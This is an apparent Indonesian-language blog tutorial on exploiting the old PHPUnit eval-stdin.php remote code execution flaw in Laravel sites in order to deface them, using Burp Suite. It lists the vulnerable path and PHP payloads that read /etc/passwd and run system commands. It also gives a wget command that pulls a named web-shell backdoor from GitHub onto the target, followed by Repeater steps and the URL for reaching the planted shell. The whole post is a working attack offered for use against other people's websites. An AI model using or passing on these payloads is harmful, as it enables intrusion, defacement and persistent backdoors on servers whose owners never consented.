Deface Laravel phpunit RCE (Remote Code Execution) With BurpSuite

 


-

Hai sobat

Saya ikal,

Disini saya akan sharing sesuatu nih.

-


kali ini kita akan bahas mengenai xploit yang udah lama banged lah yah. pasti dari judul kalian mungkin sebagian dah tau mengenai exploit ini. yah gapapa lah post aja :D. 

Bahan : 

- Shell backdoor : 

https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php

- Exploit : 

https://localhost/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

https://localhost/[path]/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

- Burpsuite

- Command : 

For read phpinfo : <?php phpinfo(); ?>

For read passwd file : <?php system('tail /etc/passwd'); ?>

For read all file in this directory : <?php system('dir'); ?>

For spawn ur shell : <?php system('wget https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php'); ?>


langsung saja masuk ketahap exploitasinya. Open burpsuite kalian masing masing, klik yang bertuliskan Proxy lalu klik yang bertuliskan Intercept Is On jika sudah, klik Open Browser. Klik Intercept Is Off lalu buka website target kalian beserta exploitnya (pastikan saat mengakses file eval-stdin.php isinya blank/kosong). sebagai contoh seperti ini.



Klik enter dan cek burpsuite kalian, disana terdapat requestan yang ditangkap oleh burpsite dari server target kita. selanjutnya klik action dan klik Send to repeater.



Jika sudah, kalian klik yang bertuliskan Repeater.



Copy salah satu command diatas dan pastekan di bawah barisan Content-Length dan klik send.



Hasilnya akan muncul sesuai command yang kalian pakai, Untuk spawn shell,kalian pakai command wget diatas dan akses shellnya di :

https://localhost/vendor/phpunit/phpunit/src/Util/PHP/MARIJUANA.php

https://localhost/[path]/vendor/phpunit/phpunit/src/Util/PHP/MARIJUANA.php


Thanks

See U